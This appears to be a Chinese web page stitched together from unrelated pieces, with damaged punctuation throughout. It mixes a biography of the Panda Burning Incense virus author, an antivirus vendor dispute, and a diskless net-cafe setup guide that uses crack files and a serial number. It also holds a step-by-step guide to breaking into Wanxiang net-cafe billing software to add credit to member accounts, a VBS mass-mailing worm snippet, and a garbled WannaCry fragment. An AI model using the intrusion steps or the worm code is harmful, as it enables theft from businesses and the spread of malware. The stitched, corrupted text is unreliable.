13年前，制造“熊猫烧香”电脑病毒的程序员李俊，现在过得怎样？

我们的命运往往只在一念之间，有的时候一个想法没考虑妥当，那么后续可能会出现一系列的连锁反应。好的选择可以让人生道路更平稳，但坏的选择则会让人生道路更加曲折，甚至不堪回首。就像是13年前，制造“熊猫烧香”电脑病毒的程序员李俊一样，错误的选择导致严重的后果。时过境迁，那么他现在过得怎样？

如果用一句话来形容李俊的人生，那就是“多行不义必自毙”。李俊，是一个天才也是一个疯子。1982年出生的他，小的时候就展露出了很强的逻辑思维能力和动手能力。4、5岁的时候，他就可以独自拆开家里的收音机、手电筒、闹钟等，并且还能完美还原。有的时候家里的收音机坏了，也是李俊负责修理的。

90年代，电脑开始慢慢在中国普及，李俊家附近有很多网吧，当时在读中专的他没事就喜欢去网吧玩电脑，在这个过程中他认识了雷磊，并且接触到了黑客圈子。李俊开始对黑客电脑技术感到好奇，他跟着雷磊进了黑客组织，学到不少电脑技术和知识。

看到儿子整日往网吧跑，父母担心李俊学坏，就专门购买了一台电脑，放在家里让他玩。自己有了电脑，让李俊有更多的时间跟着雷磊学习黑客技术。那个时候，李俊的父母怎么也想不到，自己的儿子最后会因为“玩电脑”而身陷囹圄。

2000年，从武汉当地的一家技术学院毕业之后，李俊就进了电脑城工作，整日和电脑打交道。可是李俊认为，以自己的电脑技术，不应只是在电脑城当一位修理电脑小员工，而是成为一名程序员。于是他决定去深圳、广州等大城市碰碰机会。然而，学历成了李俊的“枷锁”。在大城市里，中专出身的他根本就没有企业青睐。

屡屡面试碰壁李俊心中恼火不已，他觉得自己不比那些本科毕业的大学生差，单论电脑技术，他比很多大学生都强。然而中专的学历，却把他卡得死死的。心中不忿的李俊，决定开发一个病毒软件来证明自己。从2006年底开始，中国互联网上出现了一个名为“熊猫烧香”的病毒，病毒不断入侵用户的电脑，上百万的个人用户、网吧、企业都受到了攻击，给当时的互联网造成了巨大损失。

到2007年初，“熊猫烧香”已经肆虐互联网整整两个月，然而当时的杀毒软件对这个病毒根本没有效果，因此这个病毒被评为互联网“毒王”。2007年2月份，在全国多个城市警方的配合之下，“熊猫烧香”病毒的编写者被逮捕，正是李俊、雷磊等4人。他们编写病毒软件并售卖，非法获利10万多元。李俊被逮捕之后，在警方的要求下编写解毒软件，后被判刑入狱。2009年，在狱中表现良好的李俊提前出狱。

出狱之后，李俊有了改邪归正的想法，当时一家名为“熊猫”的网络安全公司向他抛出了橄榄枝，邀请他加盟。李俊也凭借着自己过硬的电脑技术，慢慢爬到了公司CEO的位置。而且后来李俊前往四川认养了一只真正的大熊猫，并联合公司开启了大型的公益活动。

原本以为李俊会在正确的人生道路上越走越顺，然而他又一次为利益作出了错误的选择。2013年，浙江政府官方发布了一则消息，说“熊猫烧香”的制造者，李俊以及其他人在网上设立线上赌场，涉案金额高达千万人民币。而李俊等17位网络赌场的创办人，也因此非法获利数百万人民币。

原来，李俊在当CEO的同时，还技术入股了张顺（熊猫烧香的制造者之一）等人创办的棋牌游戏公司。然而由于经营不利，该公司开发的游戏下载量寥寥无几。为了谋取利益，2011年张顺、李俊等人架设服务器，搭建了一个网络赌博平台。然后李俊又栽了，2014年经过法院审判，李俊被判有期徒刑3年。2017年出狱之后，早就身败名裂的李俊，不仅丢失了自己的CEO职位，还把自己的人生也一并弄丢了。

后记

如今，李俊早已经销声匿迹，或许是多次入狱的他被这个时代抛弃了；又或许是李俊反省了自己的行为，决定好好做一个普通人，选择低调地生活下去。纵观李俊的人生经历，可谓是“一步错步步错”。原本他第一次出狱的时候，已经走在正确的道路上了，可是后来又再次误入歧途，毁了自己的人生，让人不得不感叹。

能杀，卡巴斯基发布新闻称，针对最近肆虐互联网的“熊猫烧香”病毒，“卡巴斯基又创造了一个业界奇迹，即在此次强大的病毒攻击波中，凡是安装正版卡巴斯基反病毒软件并将其升级到最新病毒库的用户，没有一台电脑被病毒攻陷”。

而且瑞星还因为此事与卡巴打管事呢

瑞星发声明请卡巴斯基直面现实 不要指鹿为马

1月22日，卡巴斯基发布新闻称，针对最近肆虐互联网的“熊猫烧香”病毒，“卡巴斯基又创造了一个业界奇迹，即在此次强大的病毒攻击波中，凡是安装正版卡巴斯基反病毒软件并将其升级到最新病毒库的用户，没有一台电脑被病毒攻陷”。

而针对国内杀毒品牌，他们则公开诽谤道：相对于卡巴斯基超强的“内核”技术而言，国内部分反病毒品牌为绞杀“熊猫烧香”也先后推出专杀工具，但由于其反病毒产品对病毒入侵警觉性不高，再加之病毒具有绝妙的“隐形术”，从而导致其部分用户感染“熊猫烧香”，尽管其后续推出的专杀工具在一定程度对病毒起到遏制作用，但由于存储在电脑中被病毒删改的文件已无法恢复，从而给用户造成巨大的经济损失。”

针对卡巴斯基这种完全不顾事实真相的措词和含沙射影的攻击，瑞星特发表声明如下：

1、瑞星杀毒软件用户在世界级的“虚拟机脱壳”杀毒引擎和强大的本地化升级服务系统的支持下，完全可以抵御“熊猫烧香”病毒的攻击，瑞星所发布的“熊猫烧香”系列专杀工具，针对的是非瑞星用户（包括没有使用杀毒软件、或者使用某些查杀能力有问题的杀毒软件的用户）。这是瑞星作为本土厂商的社会责任所致：我们不光要保护瑞星用户，还要保护所有国内网民，抑制中国互联网上的恶性流行病毒疫情。

2、根据瑞星公司的监测，瑞星目前已经截获并升级的400多个“熊猫烧香”病毒样本，经测试，卡巴斯基最新版本只能检测出360个左右，也就是说目前瑞星截获的样本中，至少有40余种“熊猫烧香”病毒样本卡巴斯基不能查杀。

3、作为安全业界同行，瑞星建议卡巴斯基在对外发布消息时要措辞严谨，不能混淆概念欺骗用户。该文强调卡巴斯基杀毒软件可以“主动防杀‘熊猫烧香’病毒”，并且强调因为他们的“主动防御技术”才解决了“熊猫烧香”病毒？是不是卡巴斯基杀毒软件不用升级病毒库就能彻底查杀“熊猫烧香”病毒的变种？既然如此，那么为什么还要强调“正版用户只需对软件适时升级”？

4、据瑞星所知，卡巴斯基在俄罗斯和欧洲等地都发布过各种专杀工具，此次却将专杀工具作为攻击国内反病毒厂商的标靶，这是什么道理？按照该文的逻辑，只有杀毒软件不能解决问题的，才发专杀工具，难道卡巴斯基（中国）的技术水平要高于卡巴斯基的全球总部？

5、瑞星邀请卡巴斯基的用户，在升级困难的情况下，可以暂时免费使用瑞星杀毒软件（http: //wwwrisingcomcn/free/indexhtm），针对海底光缆修复困难的情况，瑞星已经发布消息，将免费时间延长两个月至3月 29日。我们有充裕的自信，让大家对这两款产品进行最直接的比较，瑞星相信迷信必将被事实击碎。

自从2006年12月27日，地震造成光缆中断以来，包括卡巴斯基在内的国外杀毒软件由于没有设立国内服务器，致使数百万用户升级遇到困难，很多用户甚至完全不能升级。而其副总居然声称，“发生此类海底电缆受损的概率非常之小，暂时不会考虑在中国设立服务器。”

众所周知，不能升级病毒库的杀毒软件，完全不具备对新病毒的查杀能力。在自己的软件不能正常升级的情况下，卡巴斯基还在奢谈“无须推出专杀工具”、“ 只需对软件适时升级即可安全使用”。正值岁末年初电脑病毒非常猖獗的时期，自12月27日光缆断裂以来，互联网上出现的新病毒已经超过20000个，每天出现的新病毒近千个，请问卡巴斯基如何保护用户不被病毒侵害？。

为了帮助那些不能升级的国外杀毒软件用户，瑞星自身承受每个月数百万元的商业损失，决定提供免费杀毒软件下载和使用，受到了广大用户的欢迎。而卡巴斯基在这个时候跳出来含沙射影地攻击国内厂商，其用意何在？以瑞星为代表的国内厂商在马不停蹄地为用户解决问题，卡巴斯基却到处宣扬“在这场没有硝烟的反病毒战役中，国际知名品牌已完全占据上风”，这难道就是一个“全球顶尖反病毒品牌”的风度吗？

我们敦促卡巴斯基（中国）公司正视现实、尊重国内用户、尊重国内同行，不要再指鹿为马、混淆事实，如果产品和服务做不好，这种低劣的表演是没有任何用处的

参考资料：

锐起无盘

一、 服务器端详细设置：

1、服务器操作系统安装：安装win2k server 版本操作系统，强烈建议单独用一个40G硬盘来安装系统，分三个区：C盘装系统，D盘存放工作站映象包等，E盘存放C盘的克隆备份及常用软件驱动等；安装过程中除了要设置“每服务器同时连接数：为N（N大于实际工作站电脑数量即可）”之外，其它默认即可！

2、安装系统及硬盘补丁：系统安装完成后，接着正确装好电脑各配件的驱动程序，然后打上win2k系统的sp4补丁，重起电脑，接着打Microsoft 的硬盘48位读写补丁再次重起电脑，（温馨提醒：在系统没有打补丁之前切记不要接上容量大于120G的硬盘，否则大容量硬盘里数据会全部自动丢失掉！）

3 、配置网络协议：除了Tcp/Ip协议之外，还要添加上IPX/SPX及NETBUT协议，其它默认即可；接着配置计算机名、工作组及IP地址等：例如：计算机名：server ,工作组：xdl,服务器IP地址为：19216801 ,子网掩码：2552552550 ,网关为服务器本机IP地址：即19216801 ;按提示重起电脑。（在系统未调试好做好备份之前尽量避免接入Internet或是潜伏有病毒的内部局域网，以免感染上可恶的病毒）

4、建立超级用户：记得启用“guest”用户帐号；然后建立一用户，例如：建立一用户名为 vod ，并授予最高级管理员权限！此用户用于工作无盘的登录。

操作步骤：（win2000server版本为例）

（1）桌面上鼠标光标移到我的电脑图标，右击鼠标右键，下拉莱单中选择“管理”，打开“计算机管理”窗口；

（2）窗口里找到：系统工具--本地用户和组--用户,鼠标左键单击“用户”，窗口右半边列表框中会显示系统原来已有的登录用户列表，找到“guest" 用户，双击打开guest属性窗口，将“帐户已停用”左边复选框里的勾去掉，然后点击确定返回计算机管理窗口；此时成功启用了guest用户帐户；

（3）建立VOD超级用户：在刚才的计算机管理窗口右边的列表框里空白地方单击鼠标右键，弹出下拉莱单中选定“新用户”，会出现“新用户”窗口，用户名输入vod ,其它为空，“用户下次登录时须更改密码”左边的复选框里的勾去掉，“用户不能更改密码”和“密码永不过期”左边的复选框打上勾，最后点击“创建”按钮完成VOD用户的创建；

（4）授予超级用户权限：双击新建好的VOD用户，打开“VOD用户属性”窗口，选择“隶属于”选项，在“隶属于”窗口里单击“添加按钮，出现“选择组”窗口，在列表框里找到“Administrators"，双击添加到当前窗口下半边的列表框里，然后确定返回到“隶属于”窗口，此时可以看到列表框里多了一个Administrators,到此，guest帐户启用及建立vod超级用户操作完成！

5、锐起无盘服务端的安装与设置：

(1)调整时间：安装之前要把服务器电脑时间调到2010年到2037年之间!!!

(2)安装锐起无盘管理器：安装装锐起管理器，用SETUPEXE安装(而不是SETUPMAN)，装好后先不要重启，把破解文件拷过去(即“锐起80用户carck”文件里的：RbsMan及RbsServs 两个文件 )替换掉原来的文件，在D盘新建三个文件夹分别命名为：system,client及user,然后再重启电脑。

(3)指定工作站系统目录：电脑重启后运行锐起管理器，出现“系统初始配置 ”窗口 ，把窗口里三个目录定位到我们刚才在D盘里建立的 system、client及 user这个在个文件夹即可，分别如下：

系统默认目录：D：\system

工作站默认目录：D:\client

用户默认目录：D:\user

定位好之后确定，进到“锐起无盘管理器V50"窗口。

(4)软件注册：单击锐起无盘管理器窗口右上角“关于”进行注册，单击“注册”输入注册码（SN:3273971053)，按确认注册成功锐起管理器自动关闲; 注册成功之后到安装目录里把注册文件RBSMANDAT 设成只读!!!只有注册了才会生成这个文件。

(5)再次调整时间：把服务器电脑时间重新调回当前日期!!!

(6) 配置工作站网卡：重新运行锐起管理器，单击主窗口左下角“网卡配置”进到网卡配置窗口,单击“添加”进到新增网卡窗口，例如你工作站用的是原装大板Tp-Link 8139网卡,此时在“网卡名称”右边下拉框里选择“RTL8139”，网卡标识右边的框里输入工作站网卡物理地址即MAC地址的前六位数, 网卡驱动默认然后确定返回管理器主窗口;

(7)设置无盘服务器的子网掩码和网关：单击无盘管理器主窗口右下角的“高级设置”，进到“系统高级设置”窗口，在“IP自动获取”选项里，单击“IP范围”下面的方框里的IP地址（这个地址就是服务器的IP地址），此时可以看到右边的几个选项变为可编辑状态，起始及终止IP默认，掩码为：2552552550；网关为：19216801（网关IP其实就是服务器电脑的IP地址）；其它选项默认即可,完成设置后按确定返回主窗口；

经过上述步骤之后，服务端的设置算是完成了，此时请重起电脑，然后打开锐起无盘管理器，等待工作站调试好之后就可以上传了！

二、工作站设置:

提醒：做无盘网络时网卡建议使用TP-Link原装宽板8139或是更好的其它品牌网卡,主板最好不要集成有网卡（或网卡启动芯片）的，如果主板集成有网卡（或网卡启动芯片）但可以完全屏蔽掉也可以使用。网卡启动芯片要用 pxe 的才行，本版本锐起无盘不支持RPL网卡启动芯片。

1、win2k安装：请先把win2k拷贝到C盘，然后直接用C盘里的win2k安装系统，安装完之后请不要删掉C盘里的win2k；这里特别要注意的是：win2k系统安装完之后重起第一次进入系统，当运行到用户与密码确认窗口时：此时用户名请输入先前在服务器上建立的那个超级用户名即" vod ",名字要一模一样!!!密码不用输，按确定进入系统；

2、驱动安装及系统优化：装好各配件的驱动程序，工作站电脑主板芯片的驱动程序一定要安装，否则其它工作站第一次登录服务器时要手工安装很多驱动程序；把屏保设为无，电源管理设为一直开，关掉休眠功能。

3、网络设置：工作组、子网掩码及网关设置和服务器的一样，工作站电脑IP地址和服务器要同在一网段内，可设为：1921680N (其中N大于或等于12，因为锐起无盘管理器默认动态分配给工作的IP地址范围是：11-254之间,11之前的IP分配给服务器用）,网络协议可以只用Tcp/IP协议，登录模式改为：友好登录!!!把网络调试到通，确保从网上邻居里能正常读取到服务器共享出来的内容;

4、点歌系统自动运行设置： 如果要让工作以后开机之后自动运行某个程序，在工作站上传之前请到注册表启动项里添加（注意：想让某个程序开机之后自动运行直接拉到：开始-程序-启动项在无盘里是不起作用的，一定要到注册表里添加才有效）。例如想让新德利vod网络版本的点歌系统包房电脑即工作站电脑开机时自动运行点歌系统，操作步骤如下：

从工作站电脑网上邻居访问服务器共享出来的点歌系统的安装目录，找自己喜欢的点歌界面程序（比如平时一般选用的是：Karaoke_Green 这个界面，），右击：Karaoke_Green ，然后发送到桌面快捷方式，此时工作站电脑桌面多了一个“快捷方式到 Karaoke_Green”图标，右击此图标选中属性，可以看到“目标T”右边的框框里有此图标的完整路径：\\Xdl-bigcattle\DVD_Debug\Karaoke_Greenexe（xdl-bigcattel是服务器计算机名），把它复制出来。开始-运行：输入regedit、按确定进到注册编辑器\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run,单击Run ,鼠标移到右边方框里空白地方，右键鼠标新建一个字符串，字符中名随便起个名比如vod,双击新建好的字符串，进到“字符串编辑”窗口，在“数值数据”下面的方框里粘贴上刚才复制出来的路径：\\Xdl-bigcattle\DVD_Debug\Karaoke_Greenexe 就可以了，关掉注册表编辑器，重起电脑试一下就知道设置是否成功！

5、设置不显示找不到鼠标对话框：把工作站电脑关掉，然后拨掉鼠标，开机登录到win98界面时会有一检测不到鼠标的提示对话框，用键盘操作，在复选框里打上勾（用键盘空格键打上勾），设置为以后不再提示此对话框，确认后进入win98,到此就可以准备向服务器上传工作站系统了。

6、工作站系统上传：从锐起无盘安装包里把“CLIENT”这个可执行文件拷贝到工作站随便一个地方，双击运行打开锐起无盘上传器，单击“远程服务器”右边的文件夹图标，出现“选择远程启动服务器”窗口，从中选定服务器计算机名后按确定返回，此时“操作系统”右边的长方框里已自动添加了win98字样,最后点击“全部上传”按钮开始上传工作站系统，上传完之后按确定即可

如果上述步骤都已正确操作，但上传时无法进行，且有“无法上传，请检查是否有什么相应的权限”之类的提示，此时请先重起服务器电脑，打开锐起管理器，然后把工作站也重起一次，等网络正常后重复第6步操作步骤即可，直到可以上传为止！

7、工作站无盘启动：工作站系统上传完之后，关机然后拨掉系统硬盘，重新开机，确保网卡PXE启动芯片已经设置为“始终网卡启动优先”模式（电脑开机时同时按 shift + F10 键可进入网卡启动芯片设置程序）；工作站电脑主板BIOS里第一启动选项也要设置为网卡启动，保存设置重起电脑即可无盘引导进入win98系统。其它工作站电脑第一次登录时请打开服务上的锐起无盘管理器，工作站电脑全部正常登录后，以后正常使用可以不用打开锐起无盘管理器，无盘后台程序会自动运行的，系统服务进程里可以看得到！

强烈建议：当所有工作都调试好之后，请对服务器电脑C盘做个克隆备份，存放到其它分区，也可以把备份文件复制多一份到其它硬盘上，以免服务器系统受到损坏时可以在短时间内恢复！在做ghost操作请把其它歌库盘电源拨掉，以免误操作，等系统克隆完成后,先关掉电脑电源,再接回歌库硬盘的电源线,开机进入系统,这样各个盘符就不会变动,如果歌库盘符乱了,请重新共享歌库盘,之后重做歌库索引一次,以保证能正常点歌！

利用万象给自己的会员加钱：

大部分的入侵技术都是利用系统本身的漏洞进行的，而其中的关键就是人——网

络管理员的素质，管理员的技术素质，工作态度在很大的程度上会左右系统的安

全性能。

本文以万象网吧管理专家系统为例，描述笔者是如何破解万象网管软件的。万象

中最为重要的一个文件是名为“OctLogmdb”数据库文件，他记录了万象的会员

数据，有会员资料，会员卡号，余额等等的敏感数据如果这个文件一旦被用心不

良的人截获并肆意修改，那后果是非常严重的。所以这里提醒网吧管理员，必须

保护好你的会员数据库。

下面是笔者重破解者的角度来描述整个破解过程，让你领会一次因配置适当而导

致的严重漏洞。

一，前期工作

首先的问题就是我们如何接近数据库文件“OctLogmdb”。这里我们简单的分析

一下，现在的网吧一般不安装万象服务器版（收银端）在C盘，原因是担心系统出

现问题丢失数据，大部分安装在C盘以外，例如安装在“D:OCTOPUS"所以我们要

确定网吧的主机是那一台，安装了“OctPUS”的盘有没有共享？如果安装了

“OctPUS”的盘没有共享，想办法让“OctLogmdb”被共享，可能你觉得共享了

“OctLogmdb”的网吧不会有，但我觉得这样的网吧是用很多的，说不定你用的

网吧就是，那你就……因为现在的网吧管理人员的水平也不是很高的。即使有的

网吧暂时＄共享“OctLogmdb”也不要灰心，有时候网吧人员变动，主机的设置

也有可能变动，这时候也是有机会的……

1，Autorun,inf文件的妙用

例如如果万象安装在D盘， 而D盘没有共享，但是其他的盘例如E盘共享了，这样

利用光盘自动运行程序的原理，在完全共享（例如E盘）的根目录建立一个

“Autoruninf”文件，用记事本就可以进行了，文件保存后缀为INF。内容如下

：

[autorun]

open=木马的路径

这样当有人想打开E盘的时候木马就会自动运行了，这个方法很容易被别人发现，

因为如果不删去“Autoruninf”文件，管理员双击就进不去E盘了，要进去的话

还要用右键点击才能打开。

2，利用Vredirvxd文件偷梁换柱

你大部分遇到的网吧可能是D盘加密了的只读共享，在Win98下破解共享密码的方

法很简单，因为在Win98共享目录密码校炼有BUG，只要将一个经过修改的

Vredirvxd文件COPY到WINDOWSSYSTEM目录覆盖源文件，重新启动电脑以后，你

再进入有密码共享的目录，出现提示输入密码的窗口时不用输入 密码，只要按住

回车键不放就可以进去了！如果网吧安装了还原精灵，我们可以这样做，点击“

关闭系统”，选择“重新启动计算机”，这时候按住Shift键不放，然后点击重新

启动确定，就可以绕过还原精灵了！

二，精彩部分

1，第一招——直捣黄龙

最幸运的情况就时你遇上了“OctPUS”目录被完全共享，而且网吧客户端安装了

Microsoft Access，这时候入侵最简单了，用客户机Microsoft Access打开收银

机的“OctLogmdb”，这是提示输入密码，输入“alpha”确定后就会看见了，选

择“打开数据库”确定后再输入一次“alpha”就可以看见如图：

不要管他，点击确定后

之后双击“userlist”就会

看见什么了？会员的资料尽收眼底，“CARDID”下就时会员的卡号，“password

”下就时密码，“remain”就时余下的金额，还有……里面的数据时可以直接修

改的，你可以在你的用户名的金额后面加个0，呵呵！你甚至还可以进行新增会员

，改变密码等操作。

2，第二招——伪装欺骗

首先去下载万象（下载地址是：http://downkk66com/showaspid=3680 ;）

，下载后选择安装服务器版，

安装路径不要和客户机安装的路径相同，安装后千万不要运行，当然，如果你不

幸运行了，在不足30秒的时间内，管理员就会站在你的身后……毛骨悚然……。

因为运行之后，“真”的服务端会有提示有另一个服务端在那一台电脑上运行。

所以我们要进行必要的设置，首先将“真”的服务器安装目录映射成本机的一个

驱动器F盘。然后打开本机控制面板的“ODBC数据原（32位）”。选择配置

“Octopus”，然后在出现的对话框中选择“真”服务端的“OctLogmdb”，点击

“配置”，在出现的图象中选择“选取”。然后在对话框中的数据原选择你映射

在你自己电脑上的数据库，也就是主机的数据原，然后推出。这是俩个服务端就

共用一个同步的数据库了。最后还要打开注册表编辑器，找到“HKEY-LOCAL-

MACHINESOFT万象幻境 ”这个键。先在“万象幻境”后新建一个主键“专家系

列网管软件服务器”，服务端暂时未运行，所以这个键要自己添加，然后在“专

家系列网管软件服务器”里面添加一个DWORD值，名称叫：LPORT，数据设为任意

一个值，比如8207。

关掉注册表就大公告成了，这时候打开本机的服务端，会弹出一个对话框，显示

错误提示，我们不用管他，点击“确定”进入后，是看不到任何局域网的计算机

的（这就是前面说的不可能反控的原因），但是可以对会员的数据库进行操作，

二个数据库的操作是同步的，所以就可以对会员卡加钱了，呵呵！

3，第三招——

值得注意的是，第三招是我在没有实际操作的情况下在猜想的，所以请朋友千万

不是以身使法！既然我们现在要做的仅仅是如何打开“OctLogmdb”，而在同一

个网络中用服务端打开会被发现，那么我们不可以在另外一个网络中通过服务端

打开呢？？？我的猜想是：首先是将自己的电脑放在局域网之外，通过修改本机

的IP地址实现！一般局域网的IP地址是19216801

我可以先将IP地址定为任意值。这时候电脑要求重新启动计算机，点取消，然后

将网卡禁止使用，电脑还是提示重新启动，不要管他，然后再将网卡启动就可以

轻松的改变IP地址了！然后……就看你的了！

1、红色代码 (Code Red， 2001年)

红色代码和红色代码Ⅱ(Code Red II)两种蠕虫病毒都利用了在Windows 2000和Windows NT中存在的一个操作系统漏洞，即缓存区溢出攻击方式。

当运行这两个操作系统的机器接收的数据超过处理范围时，数据会溢出覆盖相邻的存储单元，使其他程序不能正常运行，甚至造成系统崩溃。与其它病毒不同的是，Code Red 并不将病毒信息写入被攻击服务器的硬盘， 它只是驻留在被攻击服务器的内存中。

2、熊猫烧香(06-07年)

熊猫烧香是一种经过多次变种的蠕虫病毒，2006年10月16日由25岁的中国湖北人李俊编写，2007年1月初肆虐网络。这是一波计算机病毒蔓延的狂潮。在极短时间之内就可以感染几千台计算机，严重时可以导致网络瘫痪。

那只憨态可掬、颔首敬香的“熊猫”除而不尽。反病毒工程师们将它命名为“尼姆亚”。病毒变种使用户计算机中毒后可能会出现蓝屏、频繁重启以及系统硬盘中数据文件被破坏等现象。

同时，该病毒的某些变种可以通过局域网进行传播，进而感染局域网内所有计算机系统，最终导致企业局域网瘫痪，无法正常使用。

它能感染系统中exe，com，pif，src，html，asp等文件，它还能终止大量的反病毒软件进程并且删除扩展名为gho的备份文件。被感染的用户系统中所有exe可执行文件全部被改成熊猫举着三根香的模样。

3、SQL Slammer (2003年)

Slammer，也称蓝宝石病毒，是一款DDOS恶意程序，透过一种全新的传染途径，采取分布式阻断服务攻击感染服务器。

它利用 SQL Server 弱点采取阻断服务攻击1434端口并在内存中感染 SQL Server，通过被感染的 SQL Server 再大量的散播阻断服务攻击与感染，造成 SQL Server 无法正常作业或宕机，使内部网络拥塞。

在补丁和病毒专杀软件出现之前，这种病毒造成10亿美元以上的损失。蓝宝石病毒的传播过程十分迅速。和 Code Red 一样，它只是驻留在被攻击服务器的内存中。

4、AV终结者(2007年)

“AV终结者”又名“帕虫”， “AV”即是“反病毒”的英文(Anti-Virus)缩写，是一种是闪存寄生病毒，主要的传播渠道是成人网站、盗版**网站、盗版软件下载站、盗版电子书下载站。

禁用所有杀毒软件以及大量的安全辅助工具，让用户计算机失去安全保障;破坏安全模式，致使用户根本无法进入安全模式清除病毒;AV终结者还会下载大量盗号木马和远程控制木马。AV终结者病毒病毒运行后会生成后缀名da

5、灰鸽子(2001年)

灰鸽子是一款远程控制软件，有时也被视为一种集多种控制方法于一体的木马病毒。用户计算机不幸感染，一举一动就都在黑客的监控之下，窃取账号、密码、照片、重要文件都轻而易举。

灰鸽子还可以连续捕获远程计算机屏幕，还能监控被控计算机上的摄像头，自动开机并利用摄像头进行录像。截至2006年底，“灰鸽子”木马已经出现了6万多个变种。虽然在合法情况下使用，它是一款优秀的远程控制软件。但如果做一些非法的事，灰鸽子就成了强大的黑客工具。

——红色代码 

——灰鸽子病毒

——SQL Slammer

——AV终结者

——熊猫烧香

近年来的病毒，这里特指蠕虫病毒。

Stuxnet蠕虫，MS10-061，当蠕虫值入机器后，把自己设置成开机自启动，并释放驱动文件，把该驱动设置为服务自启动。该驱动负责突破系统TCP半开连接数限制，以方便蠕虫通过网络传播。感染系统的可移动驱动器（即U盘等），可通过U盘传播自身。通过MS10-061打印机服务远程代码执行漏洞在局域网传播自身。并尝试利用一些弱口令企图猜解并取得主机权限，危及整个网络的安全。为计算机设置了一个后门，不断尝试连接远程黑客服务器，收集用户信息，接收黑客指令，并可获取黑客远程服务器木马并执行，带来严重安全隐患。

熊猫烧香对我来说有点久远，虽然我有初始的蠕虫病毒，但没有解析关键的代码，只从网络中找到说是变了50次的变种一部分。

 Set objOA=WscriptCreateObject（"OutlookApplication"）

创建一个OUTLOOK应用的对象

Set objMapi=objOAGetNameSpace（"MAPI"）

取得MAPI名字空间 For i=1 to objMapiAddressListsCount  遍历地址簿

 Set objAddList=objMapiAddressLists（i）For j=1 To objAddList AddressEntriesCount  

Set objMail=objOACreateItem （0）objMailRecipientsAdd （objAddList AddressEntries （j）

取得收件人邮件地址

 objMailSubject=" 你好!"  

设置邮件主题

objMailBody="这次给你的附件，是我的新文档！"  

设置信件内容

objMailAttachmentsAdd（“c:virusvbs"）

把自己作为附件扩散出去

objMailSend  

发送邮件

Next  

Next  

Set objMapi=Nothing  

Set objOA=Nothing  

这块是源码的传播方式，其实是劫持了邮箱的账号密码，自动发送邮件给好友，其实附件带的就是病毒复制体了。与最近的比特币病毒相关的也只有在局域网中通过455端口迅速感染。

它的感染方式主要是通过下载，病毒会删除ghost文件，并对文档的进行更换，不会对文件造成损坏。

而比特币病毒不同。

WannaCry木马利用泄漏的方程式工具包中的“永恒之蓝”漏洞工具从MS17_010漏洞进行网络端口（455端口）扫描攻击，目标机器被成功攻陷后会从攻击机下载WannaCry木马进行感染，并作为攻击机再次扫描互联网和局域网其他机器，行成蠕虫感染大范围超快速扩散。

木马母体为mssecsvcexe，运行后会扫描随机ip的互联网机器，尝试感染，也会扫描局域网相同网段的机器进行感染传播，此外会释放敲诈者程序taskscheexe，对磁盘文件进行加密勒索。

V1=0;

Do

{

P_payload=&payload_x86;

If(v1)

P_payload=&payload_x64;

V3=(void )&FileName[4v1=260];

（&v11+v1)=(int)v3;

memcpy(v3,p_payload,v1!=051364:16480);

(&v11+v1)+=v1!=0513634:16480;

++v1

}

While(v1<2);

V4+CreateFileA(FileName,08000000u,1u,03u,4u,0);

这个就是利用MS17_010的数据了，这个锅只能背给不更新补丁的人了。

木马加密使用AES加密文件，并使用非对称加密算法RSA 2048加密随机密钥，每个文件使用一个随机密钥，下面就是密码学的概率了，就和当初二战时期德军的恩尼格玛密码机一样，每一天的密码算法是天文数字，除非得到密钥，其余不可能破解。

熊猫烧香是不会损害文件的，但这个是可以的。

doc, docx, xls, xlsx, ppt, pptx, pst, ost, msg, eml, vsd, vsdx, txt, csv, rtf, 123, wks, wk1, pdf, dwg, onetoc2, snt, jpeg, jpg, docb, docm, dot, dotm, dotx, xlsm, xlsb, xlw, xlt, xlm, xlc, xltx, xltm, pptm, pot, pps, ppsm, ppsx, ppam, potx, potm, edb, hwp, 602, sxi, sti, sldx, sldm, sldm, vdi, vmdk, vmx, gpg, aes, ARC, PAQ, bz2, tbk, bak, tar, tgz, gz, 7z, rar, zip, backup, iso, vcd, bmp, png, gif, raw, cgm, tif, tiff, nef, psd, ai, svg, djvu, m4u, m3u, mid, wma, flv, 3g2, mkv, 3gp, mp4, mov, avi, asf, mpeg, vob, mpg, wmv, fla, swf, wav, mp3, sh, class, jar, java, rb, asp, php, jsp, brd, sch, dch, dip, pl, vb, vbs, ps1, bat, cmd, js, asm, h, pas, cpp, c, cs, suo, sln, ldf, mdf, ibd, myi, myd, frm, odb, dbf, db, mdb, accdb, sql, sqlitedb, sqlite3, asc, lay6, lay, mml, sxm, otg, odg, uop, std, sxd, otp, odp, wb2, slk, dif, stc, sxc, ots, ods, 3dm, max, 3ds, uot, stw, sxw, ott, odt, pem, p12, csr, crt, key, pfx, der

这些都是病毒会攻击的文档后缀。

和熊猫不同的是，它会通过tor匿名，监听9050端口，通过本地代理通信实现与服务器连接。